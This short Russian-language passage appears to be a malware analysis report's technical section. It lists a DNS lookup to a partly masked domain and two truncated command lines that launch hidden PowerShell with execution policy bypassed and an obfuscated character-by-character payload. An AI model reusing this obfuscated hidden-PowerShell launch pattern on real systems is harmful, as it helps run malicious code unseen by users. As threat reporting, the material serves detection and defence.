Техническая информация
- DNS ASK po####utoon.info
- '<SYSTEM32>\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden $ulmejqi='^$';$gycumy='^p';$eslyrj='^a';$axigzex='^t';$ukpymfa='^h';$ctidhen='^=';$jokpa='^(';$yxulxys='^$...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden $ulmejqi='^$';$gycumy='^p';$eslyrj='^a';$axigzex='^t';$ukpymfa='^h';$ctidhen='^=';$jokpa='^(';$yxulxys='^$...